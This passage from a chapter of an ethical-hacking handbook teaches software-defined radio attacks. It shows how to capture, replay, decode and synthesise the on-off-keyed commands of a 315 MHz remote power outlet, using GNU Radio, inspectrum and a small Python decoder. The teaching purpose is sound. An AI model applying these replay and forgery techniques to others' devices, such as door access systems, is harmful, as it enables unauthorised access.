              that a spike occurs at 316 MHz; this is an artifact of the test equipment (DC offset) and
              is not of concern for our testing. The DC offset shows up at the center frequency and is
              the reason we tuned the receiver to 316 MHz to move it out of the way. At this point, we
              have enough data captured to move on to the next phase, Replay.

              Replay
              Now that we have captured signals, it is time to attempt to replay the data. Although the
              inability to successfully replay the data does not necessarily mean that we failed to capture
              the data correctly, the ability to successfully replay the data does indicate a potential com-
              munication flaw. For systems where security is of concern, antireplay mitigations should
              be in place to prevent unauthorized access. The general use case of a device like this is to
              simply turn on or off a light, fan, or some other simple device. Therefore, I would suspect
              that replay attacks are likely not mitigated. The main goal of the replay attack is to suc-
              cessfully exercise the device with minimal understanding of the actual protocol.
                 The flow graph of the Replay phase will look like the Capture phase, with the exception
              that we now use a file as the source and an osmocom as the sink. We have to reuse the
              same sample rate and frequency in order for the signal to be reproduced as it was received.
                                                                               Chapter 22: Software-Defined Radio
Figure 22-3
Captured signal

                                                                                                                    PART IV
Additionally, Multiply Const, QT GUI Time Sink, and Throttle blocks have been added
to the graph in Figure 22-4 to facilitate adjustments that may be required. Throttle is
added to keep the CPU utilization down if we do not have an external sink to effectively
rate-limit the data. Essentially, if the osmocom sink is disabled and the throttle is missing,
the data being read from the file is not rate-limited and CPU utilization may be high.

             NOTE Make sure to use the Kill (f7) function to close the running flow
             graph in order to allow the SDR to clean up properly. I have found that on
             occasion, the transmitter does not stop transmitting, even when the Kill
             function is used, so be careful not to continue transmitting after you are
             done. Unfortunately, without a secondary SDR to monitor the transmission,
             it is difficult to determine if there is continuous transmission. A reset of the
             device can be used to ensure that transmission has stopped.

   When the flow graph was originally run with a multiplier constant of 1, the power
outlet did not turn on. From the frequency plot in Figure 22-5, it looks like we are at least
transmitting on the correct frequency, so something else must be impeding our progress.
Because we are in the Replay phase and are not trying to completely reverse-engineer the
protocol at this time, we have a few more knobs that can be turned. The time plot shows
the signal in the time domain, with time on the X axis and amplitude on the Y axis.
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 22-4 Replay flow graph: remote_analysis_replay.grc

              The transmitted signal’s amplitude in Figure 22-5 ranges from –0.2 to 0.2, which is likely
              not enough power for the outlet’s receiver. In this case, we can simply change the multi-
              plier constant to 4 and play it again (already reflected in the flow graph in Figure 22-4).
                 In many cases, the ability to successfully replay is “game over.” For example, if a door
              access control device does not have replay mitigations, an attacker could acquire a sample
              and gain unauthorized access. Now that we have successfully replayed the captured sig-
              nal, we can move to the Analyze phase.

              Analyze
              Up until now, we have proven that we can capture and replay the signal, but we really
              don’t know what is being transmitted. During this phase, we will attempt to learn how
              the device differentiates between different button pushes and whether it is intelligent
              enough to exclude other remotes. To accomplish both of those tasks, we must learn how
              the data is encoded. Although we could use the gnuradio_companion to do the analysis,
              we are going to use another tool that makes the task a bit easier: inspectrum.
                                       Chapter 22: Software-Defined Radio

                                                                            PART IV

Figure 22-5 Time and frequency plots
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 22-6 Time plot illustrating on-off keying

                  Inspectrum (https://github.com/miek/inspectrum) is an offline radio signal analyzer
              that works on captured radio signals. At the time of this writing, the version of inspectrum
              installed by apt in Ubuntu lags the latest version and does not include some extremely
              useful features. I recommend building it from GitHub. In order to build inspectrum
              from source, you will also need to install liquid-dsp. On a base install of Ubuntu, inspec-
              trum can be installed with the commands located in the Analyze directory’s README
              .txt file from the book’s download site.
                  To transmit data between stations, a carrier signal is modulated with the data to be
              transmitted. The carrier signal, or frequency, is known by both parties and “carries”
              the data. On-off keying is a simple amplitude modulation method that results in the
              presence or absence of the carrier frequency to convey information (see Figure 22-6).
              A simple form of on-off keying may only have pulses of one duration, where the presence
              of the pulse is a 1 and the absence of a pulse for that duration is a 0. A slightly more com-
              plicated form could use a long pulse as a 1 and a short pulse for a 0. The smallest amount
              of time for a transition from some amplitude to no amplitude is called the symbol period.
                  With inspectrum installed, we simply run it and make the adjustments necessary
              for our samples in the GUI. If you do not have the device, you can use the capture
              files included in the Capture directory from the book’s download site to follow along.
              In Figure 22-7, you will notice that we have opened the capture for turning outlet 1
              on (remote1-1on-4m-316mhz) and set the sample rate to 4000000 (the rate at which
              we captured the signal). The horizontal axis is time, and the vertical axis is frequency.
                                                                           Chapter 22: Software-Defined Radio

Figure 22-7   Inspectrum diagram

                                                                                                                PART IV
The color of the information displayed onscreen can be thought of as intensity and can
be adjusted by moving the Power Max and Min sliders. Adjust the Power Max and Min
sliders such that you see more distinct edges in this case. The –1 MHz on the verti-
cal scale refers to 316 MHz to 1 MHz (or 315 MHz). Furthermore, if you follow the
diagram horizontally from there, you will see a bunch of dashes of differing sizes with a
space between them. The dashes at our operating frequency look like Morse code and are
indicative of a form of on-off keying.
    To decode the data, we need to calculate the symbol period and translate the sym-
bols of a single packet. Fortunately, inspectrum provides several tools to measure the
signal and capture the symbol data. The cursor function provides a means to graphically
partition the diagram into symbols of a specified length. Additionally, hidden on the
middle mouse button is the ability to add an amplitude plot and extract symbols. In
Figure 22-8, you see the addition of the cursor at a symbol period of 272μs and eight
periods overlaid on the signal. To determine the symbol period, align the front edge of
the cursor at the beginning of the smallest symbol and scale the cursor to align at the
end of the same symbol. Then simply move the region to align at the start of all symbols
and increase the number of symbols. The original symbol period will not be precise,
but it should be in the ballpark. The main idea is to ensure that the edges of all symbols
align with an edge of a period. Even with such a simple plot, several pieces of important
information are conveyed:

   • The smallest duration pulse is 272μs.
   • The longest duration pulse is three times the smallest duration pulse.
   • Four 272μs symbol periods occur between the beginning of one pulse and the
     beginning of the next pulse.
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 22-8 Measuring the symbols

                 Now that we have what appears to be the symbol period, we should increase the num-
              ber of symbols and see if we continue to line up with the edges of the dashes throughout
              the entire packet of data. Simply zoom out on the diagram and see where the last pulse
              aligns. In our case, we were slightly off, and I needed to stretch the period slightly such
              that the symbol period is 275μs instead of 272μs. This is not unexpected, considering
              that any errors in the initial measurement are multiplied by 100 in this case.
                 With the symbol rate and period confirmed, we can now extract the symbols and
              translate them into binary data. To accomplish this, we use the amplitude plot from the
              middle mouse. When the amplitude plot is added, a new bracket is added to the spectrum
              graph with three horizontal lines. The bracket must be aligned (centered) on the symbol
              data to get an amplitude plot of the symbol data on the newly added amplitude plot. In
              this case, when the brackets are centered over the symbol data and the Power Max/Min
              settings are reasonable, the plot begins to look like a square wave (see Figure 22-9). Once
              the square wave looks like a square wave, we use the middle mouse once again to extract
              the symbols to standard output (stdout). The extracted values are then printed out on the
              command line where inspectrum was invoked (see Figure 22-10). At this point, we’ll
              move into a little Python programming to translate the amplitude vector into a binary
              vector for further processing.
                 The symbols that have been extracted are between –1 and 17, so we need to convert
              them to binary data for easier processing. A reasonable method of conversion is to pick
              a threshold value where anything greater than the threshold is a binary 1 and anything
              lower is a binary 0. The upcoming decode-inspectrum.py script allows the user to select
              a threshold based on the values extracted from inspectrum.
                                 Chapter 22: Software-Defined Radio

                                                                      PART IV
Figure 22-9 Amplitude plot

Figure 22-10 Extracted symbols
Gray Hat Hacking: The Ethical Hacker’s Handbook
                                           NOTE The actual minimum and maximum values will vary depending
                                           on the Power Min/Max settings. I’ve added thresh (for threshold) to the
                                           decode function to allow you to account for different values.

GH6 > ❶ipython3
Python 3.8.10 (default, Jun 2 2021, 10:49:15)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.13.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]: ❷load decode-inspectrum.py

In [2]: #!/usr/bin/env python

import bitstring
from bitstring import BitArray, BitStream

def decode(pfx,thresh,symbols):
    s y mb o l S t r i n g = ' '

      f o r i i n s y mb o l s :
            i f i >t h r e s h :
                  s y mb o l S t r i n g + = ' 1 '
            el se:
                  s y mb o l S t r i n g + = ' 0 '

      h e x S y mb o l s = Bi t Ar r a y ( ' 0 b ' + s y mb o l S t r i n g )
      c o n v e r t e d S y mb o l s = h e x S y mb o l s . h e x . r e p l a c e ( ' e ' , ' 1 ' ) . r e p l a c e ( ' 8 ' , ' 0 ' )
      p r i n t ( " { 0 : < 1 2 s } { 1 } " . f o r ma t ( p f x , h e x S y mb o l s ) )
      p r i n t ( " { 0 : < 1 2 s } { 1 } " . f o r ma t ( p f x , Bi t Ar r a y ( ' 0 b ' + c o n v e r t e d S y mb o l s [ : - 1 ] ) ) )
      p r i n t ( s y mb o l S t r i n g )

In [3]: ❸tmp= 16.8144, 16.9547, 16.5725, -0.999272, 17.3654, -0.996848, -0.999571, -0.993058,
17.4464, -0.996842, -0.997412, -0.998701, 16.4391, 16.539, 16.8396, -0.99971, 17.4098, -0.998961,
-0.999215, -0.999266, 17.6255, -0.997948, -0.999665, -0.997095, 16.7962, -0.998431, -0.999317,
-0.997847, 16.9901, 16.8522, 16.5621, -0.997813, 17.4498, 16.2673, 17.0281, -0.99554, 17.5745,
16.7143, 17.0249, -0.999877, 16.2243, -0.999978, -0.997165, -0.998568, 16.7289, 17.4944, 17.4021,
-0.997684, 17.4977, 17.0088, 16.4327, -0.998229, 16.1483, -0.999961, -0.998696, -0.998189, 16.8322,
-0.997751, -0.995315, -0.996984, 18.5881, -0.999142, -0.997718, -0.997556, 17.4115, -0.999687,
-0.999922, -0.998284, 18.465, -0.998248, -0.999491, -0.997841, 17.7649, -0.999843, -0.999323,
-0.998556, 17.8577, -0.999423, -0.997512, -0.999266, 17.9569, -0.999706, -0.998791, -0.998976,
17.4343, -0.995211, -0.998814, -0.996952, 17.6677, -0.999965, -0.999467, -0.997974, 17.8313, 16.8585,
16.4318, -0.997114, 17.6524, -0.999487, -0.9997, -0.999322

In [4]: ❹decode("one on",10,tmp)
one on       ❺0xe88e888eee8ee8888888888e8
one on       ❻0x91d801

❼1110100010001110100010001000111011101110100011101110100010001000100010001000100010001000100011101000

In [5]: quit

                     To interactively play with the data, I use ipython3 ❶, but feel free to run the code
                  however you choose. One benefit of ipython3 is that you can modify the routine and
                  reload ❷ it at will. The decode ❹ routine takes the output ❸ of the extract symbols
                  from inspectrum and prints the decoded data in the form of the raw hex decode ❺, the
                                                                            Chapter 22: Software-Defined Radio
translated symbols decode ❻, and the raw binary decode ❼. The translated symbols
decode is based on the fact that on-off keying appeared to have two symbols. The binary
data reflects the same two symbols, with the long pulse being 0xe and the short pulse
being 0x8. The result of running the decode on all captures is shown next:
# Hex representation of symbols
# Data separated on groupings of 2 bits, 16 bits, 7 bits
r e mo t e 1 o n e o n       0xe8 8e888eee8ee88888 88888e8
r e mo t e 1 t wo o n        0xe8 8e888eee8ee88888 8888e88
r e mo t e 1 t h r e e o n   0xe8 8e888eee8ee88888 888e888
r e mo t e 1 o n e o f f     0xe8 8e888eee8ee88888 888ee88
r e mo t e 1 t wo o f f      0xe8 8e888eee8ee88888 88e88e8
r e mo t e 1 t h r e e o f f 0xe8 8e888eee8ee88888 88e8888
r e mo t e 2 o n e o n       0xe8 ee8eeeeeeee8eeee 88888e8
r e mo t e 2 t wo o n        0xe8 ee8eeeeeeee8eeee 8888e88
r e mo t e 2 t h r e e o n   0xe8 ee8eeeeeeee8eeee 888e888
r e mo t e 2 o n e o f f     0xe8 ee8eeeeeeee8eeee 888ee88
r e mo t e 2 t wo o f f      0xe8 ee8eeeeeeee8eeee 88e88e8
r e mo t e 2 t h r e e o f f 0xe8 ee8eeeeeeee8eeee 88e8888

# Converted values (assuming 0xe=1 and 0x8=0)
r e mo t e 1 o n e o n         0x91d801
r e mo t e 1 t wo o n          0x91d802
r e mo t e 1 t h r e e o n     0x91d804
r e mo t e 1 o n e o f f     0x91d806

                                                                                                                 PART IV
r e mo t e 1 t wo o f f      0x91d809
r e mo t e 1 t h r e e o f f 0x91d808
r e mo t e 2 o n e o n       0xb7f bc1
r e mo t e 2 t wo o n        0xb7f bc2
r e mo t e 2 t h r e e o n   0xb7f bc4
r e mo t e 2 o n e o f f     0xb7f bc6
r e mo t e 2 t wo o f f      0xb7f bc9
r e mo t e 2 t h r e e o f f 0xb7f bc8

   It is not quite clear what the beginning of each packet is, but it consistently appears
to begin with binary 10 (represented as 0xe8 in hex). After that, the data differs only
between remotes, which may indicate an addressing scheme since the remotes only work
on the paired outlets. If we compare the same operation on both remotes, the last 4 bits
are clearly the operation being performed (that is, turn on Outlet 1). If it wasn’t obvious
before, we now know that replay attacks will only work with the paired outlet.

Preview
We are now at the point where we hope all the effort pays off and we can synthesize our
own data using the results of the analysis. The goal of the Preview step is to verify that
the data we are going to send looks like what we expect prior to sending it over the air.
This step could be combined with the Execute step, but I think it is important enough to
warrant its own step to ensure we do not skip it and start transmitting.
   Up until now, the flow graphs we created have been relatively simple with very few
moving parts. To create the signal from scratch, we will be using several new blocks, as
Gray Hat Hacking: The Ethical Hacker’s Handbook
                Name                        Purpose                                  Parameters of Interest
                Vector                      A vector of binary data to transmit.
                Patterned                   Combines several sources into a          Pattern of the inputs. The pattern
                Interleaver                 single vector.                           indicates the number of values taken
                                                                                     from each source. In this case, you
                                                                                     combine the nonchanging data with
                                                                                     the addressing, operation, and gap.
                Constant Source             Provides a constant binary 0 to the
                                            patterned interleaver to help with
                                            the gap between packets.
                Repeat                      Converts the binary pattern to           Interpolation: sample_rate *
                                            the symbol pattern by repeating          symbol_rate
                                            each binary value based on the           1 MSps * 275μs/symbol = 275
                                            symbol and sample rate prior to          samples per symbol
                                            transmission.
                Multiply                    Mixes (modulates) the data with
                                            the carrier. This effectively turns on
                                            and off the carrier frequency (on-
                                            off keying).
                Source                      Generates the carrier frequency.         Sample Rate: 1M
                                                                                     Waveform: Cosine
                                                                                     Frequency: 314.98 MHz
                Osmocom Sink                Transmits the data provided              Sample Rate: 1M
                                            via the SDR.                             Ch0: Frequency: 314.98 MHz
                                                                                     Ch0: RF Gain: 8
Table 22-3 Description of New GNU Radio Blocks for Signal Synthesis

              described in Table 22-3. The flow graph in Figure 22-11 includes the osmocom sink
              block, but notice that the arrow and the block are a different color than the other arrows
              and blocks. This indicates that they are disabled. Another subtle change is that we have
              switched to 1 MSps instead of our typical 4 MSps. Because we are synthesizing the data,
              we do not have to use the same sample rate as before. Additionally, the selected sample
              rate made it easier to show that the symbol rate was 275μs.
                 The patterns are taken from the binary representation of the remote one on command:
Pattern = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2
,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2
,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2]

Input 0 = 28 symbols of zero to create the gap between packets
Input 1 = 8 symbols of Non-Changing Data: 0xe8
Input 2 = 92 symbols of Addressing Data for remote 1 plus the 16 symbols of the
command to turn on outlet 1: 0x8e888eee8ee8888888888e8

                 Once you have run the flow graph, you will have a new capture file called test-preview.
              Repeating the steps of the analysis on the test-preview capture should yield the same (or
              similar) results if you did not make any mistakes in the flow graph (see Figure 22-12).
                 Note that the total number of symbol periods is 128, which matches the pattern with
              the gap.
                                                   Chapter 22: Software-Defined Radio

                                                                                        PART IV
Figure 22-11 Replay flow graph: test-preview.grc

Figure 22-12 Inspectrum diagram of preview
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 22-13 Final execute flow graph: test-execute.grc

              Execute
              We have verified that the synthesized data looks like the data we received over the air. The
              only thing left is to enable the osmocom sink (see Figure 22-13), transmit by executing
              the flow graph, and watch the power outlet turn on. To enable the sink, simply right-
              click the block and select Enable. If you are playing along, you will likely want to disable
              the file sink to minimize the storage used. At this point, you can take a bow because you
              have successfully replicated the functionality of the remote from scratch using an SDR.

              Summary
              Although we have barely scratched the surface of what can be done using an SDR with
              GNU Radio, we were able to analyze a very simple RF device. Using the SCRAPE pro-
              cess, we discovered the operating frequency, captured data, performed a replay attack, got
              an understanding of the structure of the data, and synthesized the data from scratch. You
              also saw how GNU Radio allows you to simulate signals without having to interface with
              hardware. Hopefully, this chapter has piqued your interest in SDR and given you some
              confidence that the subject is not beyond your reach.
                                                                 Chapter 22: Software-Defined Radio
For Further Reading
bladeRF www.nuand.com/
GNU Radio tutorials wiki.gnuradio.org/index.php/Guided_Tutorial_Introduction,
wiki.gnuradio.org/index.php/Guided_Tutorial_GRC, wiki.gnuradio.org/index.php/
Guided_Tutorial_GNU_Radio_in_Python
HackRF One greatscottgadgets.com/hackrf/
Inspectrum github.com/miek/inspectrum
IPython ipython.readthedocs.io/en/stable/index.html
PyBOMBS github.com/gnuradio/pybombs
The National Association for Amateur Radio www.arrl.org
“Software Defined Radio with HackRF” (tutorial by Michael Ossmann, the creator
of HackRF) greatscottgadgets.com/sdr/
USRP www.ettus.com/product/category/USRP-Bus-Series

                                                                                                      PART IV
This page intentionally left blank
